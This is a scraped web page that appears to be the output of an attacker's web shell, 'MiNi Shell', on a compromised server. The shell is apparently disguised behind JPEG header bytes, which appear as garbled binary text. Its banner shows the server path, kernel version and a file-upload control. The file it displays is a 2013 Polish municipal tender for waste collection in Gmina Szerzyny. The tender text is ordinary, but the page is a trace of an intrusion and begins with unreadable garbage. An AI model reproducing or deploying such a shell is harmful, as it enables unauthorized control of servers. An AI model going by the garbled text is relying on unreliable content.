JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130509/70131-N-2013.html

<p class="kh_header"><b>Szerzyny 521: Odbiór odpadów komunalnych z terenu gminy Szerzyny oraz ich zagospodarowanie</b><br>
<b>Numer ogłoszenia: 70131 - 2013; data zamieszczenia: 09.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Szerzyny , 38-246 Szerzyny 521, woj. małopolskie, tel. 14 651-73-00, faks 14 651-79-01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szerzyny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów komunalnych z terenu gminy Szerzyny oraz ich zagospodarowanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia:
1. Przedmiotem zamówienia jest usługa polegająca na odbieraniu odpadów komunalnych oraz ich zagospodarowaniu od właścicieli nieruchomości zamieszkałych i niezamieszkałych na terenie Gminy Szerzyny, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowanie do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych, ulegających biodegradacji przekazywanych do składowania, zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz. 391), zapisami Uchwały Nr XXV/398/12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012 r.               w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego oraz przepisami Regulaminu Utrzymania Czystości i Porządku w Gminie Szerzyny.
Powierzchnia Gminy Szerzyny wynosi 82 km2. Liczba ludności zameldowanych na dzień                 1 kwietnia 2013 r. wynosi 8157 osób. Dotychczas odbiorem odpadów komunalnych objętych jest ok. 2000 gospodarstw domowych oraz  ok. 250 podmiotów gospodarczych, firm i instytucji znajdujących się na terenie 5 sołectw gminy Szerzyny: Szerzyny, Ołpiny, Czermna, Żurowa, Swoszowa.
Uwaga: Podana ilość nieruchomości jest liczbą orientacyjną. Zamawiający zastrzega sobie prawo do zmiany ilości punktów odbioru odpadów. Ich ilość w ciągu okresu realizacji zamówienia może ulec zmianie.
Średnia ilość odpadów wywiezionych w 2012 r. to ok. 528 Mg odpadów niesegregowanych                   i ok. 122 Mg odpadów segregowanych (papier, szkło, tworzywa sztuczne, metal, odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny). 
Przedmiotem zamówienia nie jest odbiór odpadów ciekłych, odpadów nieznanego pochodzenia, odpadów o składzie niezgodnym z wymaganiami przy obrocie odpadami. Zbiórka, wywóz i zagospodarowanie odpadów powinno się odbywać zgodnie z wytycznymi Wojewódzkiego Planu Gospodarki Odpadami, Gminnego Planu Gospodarki Odpadami, Regulaminem Utrzymania Czystości i Porządku w Gminie Szerzyny oraz obowiązującymi przepisami prawa polskiego. 
Uwaga: Ilość wytworzonych i odebranych odpadów z terenu gminy Szerzyny nie jest zależna od Zamawiającego. Podane wyżej ilości odpadów należy traktować jako orientacyjne. Wykonawcy nie przysługuje prawo dodatkowego wynagrodzenia czy odszkodowania za odbieranie wytworzonych odpadów w innych wielkościach.

2. Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie:
2.1. Zbieranie i zagospodarowanie zmieszanych niesegregowanych odpadów komunalnych o kodzie 20 03 01 zgromadzonych w workach lub pojemnikach, usytuowanych przy budynkach mieszkalnych, w zakładach pracy, punktach handlowych i punktach usługowych, szkołach, instytucjach i innych podmiotach oraz przy ulicach i placach,
2.2. Zbieranie i zagospodarowanie segregowanych ( gromadzonych w sposób selektywny ) podanych poniżej rodzajów odpadów:
2.2.1. Papier i tektura ( kod 20 01 01, 15 01 01),
2.2.2. Szkło ( kod 20 01 02, 15 01 07),
2.2.3. Tworzywa sztuczne ( kody 20 01 39, 15 01 02),
2.2.4. Metal ( kod 15 01 04, 20 01 40)
2.2.5. Opakowania wielomateriałowe ( kod 15 01 05),
2.2.6. Odpadów zielonych biodegradowalnych o kodzie 20 02 01,
gromadzonych w odpowiednio oznakowanych workach lub pojemnikach
2.2.7. Odpady wielkogabarytowe, które ze względu na swój rozmiar nie mogą być zbierane w typowych pojemnikach i/lub workach na odpady, np. stare meble,
2.2.8. Odpady elektryczne i elektroniczne, np. lodówki, pralki, telewizory itp.,
2.2.8.  Zużyte opony. 

3. W ramach zagospodarowania odpadów podmiot odbierający odpady zobowiązany jest do przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do regionalnej lub zastępczej regionalnej instalacji do przetwarzania odpadów komunalnych, właściwej dla regionu tarnowskiego zgodnie z uchwałą Nr XXV/398/12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego. W przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, zobowiązany jest do ich przekazywania do instalacji odzysku i unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. 2013 r., poz. 21). W zakres zamówienia wchodzi także porządkowanie terenu w miejscu gromadzenia odpadów w przypadku jego zanieczyszczenia wynikającego z przepełnienia pojemnika.
Wykonawca zobowiązuje się do prowadzenia dystrybucji worków na odpady, przynajmniej w jednym punkcie handlowym w każdym z sołectw gminy. Wykonawca zobowiązany jest również  prowadzić sprzedaż worków u kierowcy w dni zbiórki odpadów komunalnych. Wykonawca zobowiązany jest do odbioru odpadów od właścicieli posesji, którzy gromadzą odpady w pojemniki, np. worki o pojemności od 80 - 120 l wraz z podziałem na odpowiednie frakcje: 
a) worek niebieski - makulatura, 
b) worek zielony - szkło białe i kolorowe,
c) worek żółty - plastik, 
d) worek czerwony - metale, złom, 
e) worek brązowy - odpady ulegające biodegradacji,
f) worek czarny - odpady wielomateriałowe i zmieszane.

3.1. Odpady odbierane z terenu gminy będą gromadzone w następujących typach pojemników:
3.1.1. Worki na śmieci o poj. od 80 do 120 l.
3.1.2. Plastikowe pojemniki o poj. 120 l 

3.2. W celu realizacji przedmiotu umowy wykonawca musi dysponować specjalistycznymi środkami technicznymi, umożliwiającymi odbiór odpadów gromadzonych w typach pojemników o których mowa w pkt. 3.1., tj. przynajmniej:
a) 2 samochody o ładowności powyżej 3,5 t do wywozu odpadów komunalnych (śmieciarki); 
b) 1 samochód o ładowności do 3,5 t; 
c) 1 samochód o ładowności powyżej 3,5 t do wywozu odpadów segregowanych; 
d) 1 urządzenie lub samochód do mycia i dezynfekcji pojemników na odpady. 

3.3. Odbiór odpadów segregowanych można dokonywać jednym wyspecjalizowanym pojazdem nie dokonując mieszania poszczególnych frakcji odpadów selektywnie zebranych.

3.4. Odpady niesegregowane (zmieszane) gromadzone będą w czarnych workach. 
W przypadku nieruchomości zamieszkałych, odpady zmieszane wywożone będą:
- 2 razy w miesiącu w sezonie letnim (tj. od 01 kwietnia do 31 października),  
- 1 raz w miesiącu w sezonie zimowym (tj. do 01 listopada do 31 marca). 
W przypadku nieruchomości niezamieszkałych (szkoły, przedszkola, właściciele nieruchomości na których prowadzona jest działalność hotelarska, gastronomiczna i handlowa) odpady zmieszane i ulegające biodegradacji Wykonawca jest zobowiązany odebrać 1 raz w tygodniu.
Odpady posegregowane odbierane będą 1 raz w miesiącu. 

3.5. Odbiór segregowanych i niesegregowanych odpadów komunalnych oraz odpadów biodegradowalnych z nieruchomości zamieszkałych odbywać się będzie zgodnie z harmonogramem stanowiącym załącznik 1 do umowy. Wykonawca zobowiązany jest przedstawić do akceptacji Zamawiającego harmonogram, przed podpisaniem umowy.

3.6. Wywóz segregowanych i niesegregowanych odpadów komunalnych z nieruchomości niezamieszkałych (tj. zakłady pracy, punkty handlowe, obiekty użyteczności publicznej oraz inne obiekty) odbywać się będzie w terminach ustalonych przez Wykonawcę w harmonogramie stanowiącym załącznik 1 do umowy. 

3.7. Odpady komunalne wielkogabarytowe, budowlane i rozbiórkowe, przeterminowane leki, zużyte opony, zużyty sprzęt elektryczny i elektroniczny, baterie i akumulatory oraz chemikalia odbierane będą z wszystkich nieruchomości zamieszkałych, w ramach zbiórki objazdowej, dwa razy w roku według harmonogramu stanowiącego załącznik nr 1 do umowy. Termin odbioru uzgadnia Wykonawca z Zamawiającym. Zamawiający podaje termin zbiórki do publicznej wiadomości. Wykonawca zobowiązuje się do:
- zagospodarowania ogólnej masy w/w odpadów poprzez przekazanie ich do odzysku zgodnie z przepisami obowiązującego prawa 
- przedstawienia Zamawiającemu dowodów potwierdzających ilość zebranych odpadów (tj. karty przekazania odpadu) wraz z rachunkiem/fakturą za usługę.

3.8. Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranych odpadów zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to m.in. ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno - prawnych związanych z odbieraniem i dostarczaniem odpadów uprawnionemu przedsiębiorcy, prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.

3.9. Jeżeli w toku realizacji zamówienia Wykonawca uszkodzi lub zniszczy pojemniki z odpadami, ich naprawienie i doprowadzenie do stanu poprzedniego należy do Wykonawcy.

3.10. Wykonawca przed zakwalifikowaniem odpadów segregowanych do zmieszanych w przypadku - niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, sporządza na tą okoliczność dokumentację na poziomie umożliwiającym wydanie przez Zamawiającego decyzji administracyjnej naliczającej zmianę wysokości opłaty. Dokumentację wraz z wykazem właścicieli nieprawidłowo segregujących odpady oraz fakturą miesięczną za wykonaną usługę przekaże Zamawiającemu. 
Zamawiający przekaże, w terminie do 30.06.2013 r., Wykonawcy listę nieruchomości, z których zadeklarowano odbiór odpadów w sposób selektywny.  

4. Wykonawca zobowiązany jest do:
4.1. Ważenia każdorazowo wszystkich odebranych odpadów komunalnych w punkcie wagowym wskazanym przez Zamawiającego, znajdującego się na terenie gminy Szerzyny.  
4.2. Ważenia każdorazowo wszystkich odebranych odpadów komunalnych w punkcie wagowym zlokalizowanym w miejscu przekazywania odpadów do składowania.
4.3. Terminowego zbierania i wywożenia odpadów.
4.4. Przeładowywania odpadów w legalnym i przystosowanym do tego miejscu.
4.5. Przekazywania odpadów do regionalnej instalacji do przetwarzania odpadów komunalnych, właściwej dla regionu tarnowskiego zgodnie z uchwałą Nr XXV/398/12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego.
4.6. Odbierania od właścicieli nieruchomości odpadów znajdujących się w pojemnikach i/lub  workach, posiadających umieszczone przez właścicieli nieruchomości numery identyfikacyjne w postaci kodów kreskowych. Numery identyfikacyjne dla danej nieruchomości nadaje Urząd Gminy Szerzyny. Wykonawca zobowiązany jest do prowadzenia monitoringu odbieranych odpadów z posesji poprzez zeskanowanie kodów kreskowych z podziałem odpadów na poszczególne frakcje. Zamawiający wyposaży Wykonawcę w urządzenie służące do odczytu kodów kreskowych, w ilości 1 szt. Wykonawca zakupi we własnym zakresie urządzenia do odczytu w przypadku potrzeby posiadania większej ich ilości. 
4.7. Niezwłocznego zawiadomienia Zamawiającego o okolicznościach przeszkadzających w prawidłowym wykonaniu usługi.
4.8. Rozliczania się z wykonywanych usług poprzez przedstawienie wymaganych dokumentów.
4.9. Utrzymania w należytym stanie sanitarnym i porządkowym narzędzi i urządzeń wykorzystywanych na potrzeby realizacji umowy.

5. W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany z Zamawiającym i może polegać w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości, oraz innych terminów ich odbioru. 

6. Wykonawca zobowiązany jest prowadzić i przedkładać Zamawiającemu dokumentację z realizacji przedmiotu zamówienia, tj.:
6.1. Raport Wagowy,
6.2. Kartę przekazania odpadów sporządzonych zgodnie z obowiązującymi przepisami,
6.3. Kwartalną informację o masie poszczególnych rodzajów odebranych odpadów (z podaniem kodów odpadów zgodnie z obowiązującą klasyfikacją), stanowiących pozostałość po przerobie odebranych zmieszanych odpadów komunalnych, kierowaną do składowania wraz z podaniem instalacji do której zostały one przekazane. Informacja ta ma być składana do końca miesiąca po upływie kwartału którego dotyczy.

7. Zamawiający zastrzega sobie prawo kompleksowej i wyrywkowej kontroli realizacji przedmiotu zamówienia.

8. Nazwy własne materiałów i nazw producentów użyte w SIWZ i w załącznikach należy rozumieć jako definicje standardów oraz określenie minimalnych oczekiwań jakościowych i technologicznych Zamawiającego w stosunku do przedmiotu zamówienia, a nie jako ostateczne rozwiązanie. Zamawiający dopuszcza zgodnie z art. 29 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tekst jedn. Dz. U. z 2010 r. Nr 113 poz. 759 ze zm.) zastosowanie materiałów równoważnych o cechach nie gorszych niż wyszczególnione w dokumentacji projektowej i SIWZ. Oznacza to, że Wykonawca może użyć do realizacji zamówienia materiałów i urządzeń innych producentów, ale o cechach równoważnych lub nie gorszych niż określone przez Zamawiającego w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 4 000.00 zł (słownie: cztery tysiące 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. W celu spełnienia tego warunku należy wykazać dysponowanie co najmniej następującym sprzętem:  2 samochody o ładowności powyżej 3,5 t do wywozu odpadów komunalnych (śmieciarki);  1 samochód o ładowności do 3,5 t;  1 samochód o ładowności powyżej 3,5 t do wywozu odpadów segregowanych;  1 urządzenie lub samochód do mycia i dezynfekcji pojemników na odpady.  
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>w przypadku zaistnienia okoliczności, których nie można było przewidzieć dopuszcza się zmiane harmonogramu  odbioru odpadów komunalnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szerzyny.pl zakladka BIP<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2013 godzina 09:00, miejsce: w siedzibie Zamawiającego pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com